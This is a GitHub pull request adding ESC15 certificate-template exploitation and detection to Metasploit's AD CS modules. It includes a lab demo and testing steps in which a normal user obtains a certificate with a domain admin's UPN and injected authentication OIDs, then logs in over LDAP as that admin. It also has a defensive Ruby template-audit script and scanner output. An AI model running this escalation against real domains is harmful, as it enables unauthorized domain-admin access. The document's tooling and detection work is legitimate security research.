
Add Support for ESC15 #19538

Open
wants to merge 7 commits into master

Conversation

zeroSteiner
Contributor

@zeroSteiner zeroSteiner commented Oct 8, 2024

This adds support for ESC15 to various AD CS related modules. A template is added so the ad_cs_cert_template module can create and update templates to be vulnerable to ESC15 (downgrading the schema may not work and should be tested, but creating a net-new one does work). Fingerprinting is added to the ldap_esc_vulnerable_cert_finder module to identify templates that are vulnerable to ESC15. Finally, OIDs can be specified in the icpr_cert module so a vulnerable template can be exploited by a user.

Todo

  • Test the issued certificate authenticates as the user who specified
  • Update the workflow docs for exploiting ESC15
  • Update the icpr_cert docs for the new option
  • Check on and write missing tests as necessary

Demo

Not sure why the session is showing up as from 127.0.0.1 to 127.0.0.1, but with the new ldap whoami changes, it shows that the certificate authenticated as the MSFLAB\smcintyre DA user and not the MSFLAB\mhatter normal user who issued it.

msf6 auxiliary(admin/dcerpc/icpr_cert) > show options 

Module options (auxiliary/admin/dcerpc/icpr_cert):

   Name                 Current Setting                           Required  Description
   ----                 ---------------                           --------  -----------
   ADD_CERT_APP_POLICY  1.3.6.1.4.1.311.20.2.2;1.3.6.1.5.5.7.3.2  no        Add certificate application policy OIDs
   ALT_DNS                                                        no        Alternative certificate DNS
   ALT_SID                                                        no        Alternative object SID
   ALT_UPN              [email protected]                    no        Alternative certificate UPN (format: USER@DOMAIN)
   CA                   msflab-DC-CA                              yes       The target certificate authority
   CERT_TEMPLATE        ESC15-Test                                yes       The certificate template
   ON_BEHALF_OF                                                   no        Username to request on behalf of (format: DOMAIN\USER)
   PFX                                                            no        Certificate to request on behalf of


   Used when connecting via an existing SESSION:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   no        The session to run this module on


   Used when making a new connection via RHOSTS:

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   RHOSTS     192.168.159.10   no        The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT      445              no        The target port (TCP)
   SMBDomain  .                no        The Windows domain to use for authentication
   SMBPass    Password1!       no        The password for the specified username
   SMBUser    mhatter          no        The username to authenticate as


Auxiliary action:

   Name          Description
   ----          -----------
   REQUEST_CERT  Request a certificate



View the full module info with the info, or info -d command.

msf6 auxiliary(admin/dcerpc/icpr_cert) > run
[*] Running module against 192.168.159.10

[*] 192.168.159.10:445 - Connecting to ICertPassage (ICPR) Remote Protocol
[*] 192.168.159.10:445 - Binding to \cert...
[+] 192.168.159.10:445 - Bound to \cert
[*] 192.168.159.10:445 - Requesting a certificate for user mhatter - alternate UPN: [email protected] - digest algorithm: SHA256 - template: ESC15-Test
[+] 192.168.159.10:445 - The requested certificate was issued.
[*] 192.168.159.10:445 - Certificate UPN: [email protected]
[*] 192.168.159.10:445 - Certificate Policies:
[*] 192.168.159.10:445 -   * 1.3.6.1.4.1.311.20.2.2 (Smart Card Logon)
[*] 192.168.159.10:445 -   * 1.3.6.1.5.5.7.3.2 (Client Authentication)
[*] 192.168.159.10:445 - Certificate stored at: /home/smcintyre/.msf4/loot/20241009153533_default_192.168.159.10_windows.ad.cs_800367.pfx
[*] Auxiliary module execution completed
msf6 auxiliary(admin/dcerpc/icpr_cert) > previous 
[*] The CreateSession option within this module can open an interactive session
msf6 auxiliary(scanner/ldap/ldap_login) > run RHOSTS=192.168.159.10 LDAP::Auth=schannel SSL=true LDAP::CertFile=/home/smcintyre/.msf4/loot/20241009153533_default_192.168.159.10_windows.ad.cs_800367.pfx

[+] Success: 'Cert File /home/smcintyre/.msf4/loot/20241009153533_default_192.168.159.10_windows.ad.cs_800367.pfx'
[*] LDAP session 2 opened (127.0.0.1 -> 127.0.0.1) at 2024-10-09 15:35:50 -0400
[*] Scanned 1 of 1 hosts (100% complete)
[*] Bruteforce completed, 1 credential was successful.
[*] 1 LDAP session was opened successfully.
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/ldap/ldap_login) > sessions -i -1
[*] Starting interaction with 2...

LDAP (192.168.159.10) > getuid
[*] Server username: MSFLAB\smcintyre
LDAP (192.168.159.10) >

Testing Steps

  • Use the ad_cs_cert_template to create a vulnerable certificate using the new template
    • Use the same module to read the certificate template to see that the schema is 1 and that the Client Authentication EKU is missing
  • Use the ldap_esc_vulnerable_cert_finder module to identify the new template
  • Use the icpr_cert module to issue a certificate
    • Use the new option to specify an EKU to add of 1.3.6.1.5.5.7.3.2 (Client Authentication)
    • Use the ALT_UPN option to specify a privileged user
    • When the certificate is issued, see the EKU that was specified listed as a certificate policy
  • Use the ldap_login module to authenticate using schannel to the server with the certificate
  • Run the getuid command on the session and see that it is authenticated as the user specified in the ALT_UPN datastore argument when the cert was issued
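The PR description and testing steps above give the fingerprint the finder module uses for ESC15: a schema version 1 template on which the enrollee supplies the subject, so that application policy OIDs in the request end up in the issued certificate even though the template itself lacks an authentication EKU. The following is an added audit example, not code from the PR or from Metasploit, that applies that fingerprint (and the neighbouring ESC1 check, for contrast) to template records. It assumes the records arrive as hashes of lower-cased LDAP attribute names, uses the MS-CRTD flag bits CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT (0x1) and CT_FLAG_PEND_ALL_REQUESTS (0x2), treats required RA signatures as a gate as well, and does not evaluate enrollment permissions on the template's security descriptor, which the real module also considers. The sample records are constructed, not read from a directory.

```ruby
# Added example (not the PR's or Metasploit's own code): classify AD CS
# certificate templates for the ESC15 pattern reported by the finder module,
# next to the ESC1 pattern it is easily confused with.

# Flag bits from MS-CRTD.
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001 # msPKI-Certificate-Name-Flag
CT_FLAG_PEND_ALL_REQUESTS         = 0x00000002 # msPKI-Enrollment-Flag (manager approval)

# EKU OIDs that allow a certificate to be used for domain authentication.
OID_CLIENT_AUTH     = '1.3.6.1.5.5.7.3.2'
OID_SMARTCARD_LOGON = '1.3.6.1.4.1.311.20.2.2'
OID_PKINIT_CLIENT   = '1.3.6.1.5.2.3.4'
OID_ANY_PURPOSE     = '2.5.29.37.0'
AUTH_EKUS = [OID_CLIENT_AUTH, OID_SMARTCARD_LOGON, OID_PKINIT_CLIENT, OID_ANY_PURPOSE].freeze

# Input records (assumption): Hash with lower-cased LDAP attribute names and
# integer/string values as a pKICertificateTemplate query would return them.
def enrollee_supplies_subject?(t)
  (t['mspki-certificate-name-flag'].to_i & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT) != 0
end

# Manager approval or required RA signatures stop unattended issuance,
# so such templates are not reported by either check.
def issuance_gated?(t)
  (t['mspki-enrollment-flag'].to_i & CT_FLAG_PEND_ALL_REQUESTS) != 0 ||
    t['mspki-ra-signature'].to_i > 0
end

# An empty pKIExtendedKeyUsage means "any purpose", which also permits authentication.
def ekus_permit_auth?(t)
  ekus = Array(t['pkiextendedkeyusage'])
  ekus.empty? || ekus.any? { |oid| AUTH_EKUS.include?(oid) }
end

# ESC1: requester controls the SAN and the template's own EKUs already permit authentication.
def esc1?(t)
  enrollee_supplies_subject?(t) && !issuance_gated?(t) && ekus_permit_auth?(t)
end

# ESC15: requester controls the SAN and, because the template is schema version 1,
# the CA honours application policy OIDs supplied in the request, so the EKUs
# listed on the template are not the policies the certificate ends up carrying.
def esc15?(t)
  t['mspki-template-schema-version'].to_i == 1 &&
    enrollee_supplies_subject?(t) && !issuance_gated?(t)
end

def classify_template(t)
  findings = []
  findings << 'ESC1'  if esc1?(t)
  findings << 'ESC15' if esc15?(t)
  findings
end

# Returns { template cn => [finding names] } for every record given.
def audit_templates(templates)
  templates.to_h { |t| [t['cn'], classify_template(t)] }
end

# Constructed sample records (not pulled from a real directory).
SAMPLE_TEMPLATES = [
  # schema 1, enrollee supplies subject, only a Server Authentication EKU -> ESC15
  { 'cn' => 'ESC15-Test', 'mspki-template-schema-version' => 1, 'mspki-certificate-name-flag' => 1,
    'mspki-enrollment-flag' => 0, 'mspki-ra-signature' => 0, 'pkiextendedkeyusage' => ['1.3.6.1.5.5.7.3.1'] },
  # schema 2 with Client Authentication -> ESC1 only; v2 CAs ignore request-supplied policies here
  { 'cn' => 'ESC1-Test',  'mspki-template-schema-version' => 2, 'mspki-certificate-name-flag' => 1,
    'mspki-enrollment-flag' => 0, 'mspki-ra-signature' => 0, 'pkiextendedkeyusage' => [OID_CLIENT_AUTH] },
  # same shape as ESC15-Test but manager approval is required -> no unattended issuance
  { 'cn' => 'Gated-V1',   'mspki-template-schema-version' => 1, 'mspki-certificate-name-flag' => 1,
    'mspki-enrollment-flag' => 2, 'mspki-ra-signature' => 0, 'pkiextendedkeyusage' => ['1.3.6.1.5.5.7.3.1'] },
  # schema 1 but the SAN is built from AD (CT_FLAG_SUBJECT_ALT_REQUIRE_UPN), not supplied by the requester
  { 'cn' => 'Fixed-V1',   'mspki-template-schema-version' => 1, 'mspki-certificate-name-flag' => 0x02000000,
    'mspki-enrollment-flag' => 0, 'mspki-ra-signature' => 0, 'pkiextendedkeyusage' => ['1.3.6.1.5.5.7.3.1'] }
].freeze

if $PROGRAM_NAME == __FILE__
  audit_templates(SAMPLE_TEMPLATES).each do |name, findings|
    puts "#{name}: #{findings.empty? ? 'no finding' : findings.join(', ')}"
  end
end
```

The ESC15 check deliberately ignores pKIExtendedKeyUsage: the whole point of the finding is that the template's EKU list does not constrain what a v1 template issues, which is also why the remediation is to move the template off schema version 1 or remove the enrollee-supplies-subject flag rather than to edit its EKUs.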

@smcintyre-r7 smcintyre-r7 added needs-docs rn-modules release notes for new or majorly enhanced modules labels Oct 8, 2024

github-actions bot commented Oct 8, 2024

Thanks for your pull request! Before this can be merged, we need the following documentation for your module:

@zeroSteiner zeroSteiner marked this pull request as ready for review October 9, 2024 21:40
@adfoster-r7
Contributor

Would you be able to throw in a quick report_vuln here for the new vuln? 🤞

Or I'm also happy to wait for Christophe to pick up the report_vuln calls in one batch/PR if that's easier 💯

@cdelafuente-r7
Contributor

Thanks! I haven't tested it yet, but it looks good to me.

Regarding the report_vuln, is it something we could simply add to #print_vulnerable_cert_info? It looks like the @vuln_certificate_details data structure already has all the information.

@zeroSteiner
Contributor Author

Alright with the latest commit in place, I'm reporting all of the vulnerabilities that the module is capable of finding.

msf6 auxiliary(gather/ldap_esc_vulnerable_cert_finder) > vulns --info

Vulnerabilities
===============

Timestamp                Host            Name                References                                                    Information
---------                ----            ----                ----------                                                    -----------
2024-10-10 13:23:44 UTC  192.168.159.10  ESC1 - ESC1-Test    https://posts.specterops.io/certified-pre-owned-d95910965cd2  Request can specify a subjectAltName (msPKI-Certificate-Name-Flag) and EKUs permit authentication
2024-10-10 13:23:44 UTC  192.168.159.10  ESC2 - ESC2-Test    https://posts.specterops.io/certified-pre-owned-d95910965cd2  Template defines the Any Purpose OID or no EKUs (PkiExtendedKeyUsage)
2024-10-10 13:23:44 UTC  192.168.159.10  ESC15 - ESC15-Test  https://trustedsec.com/blog/ekuwu-not-just-another-ad-cs-esc  Request can specify a subjectAltName (msPKI-Certificate-Name-Flag) and EKUs can be altered (msPKI-Template-Schema
                                                                                                                           -Version)

msf6 auxiliary(gather/ldap_esc_vulnerable_cert_finder) > 
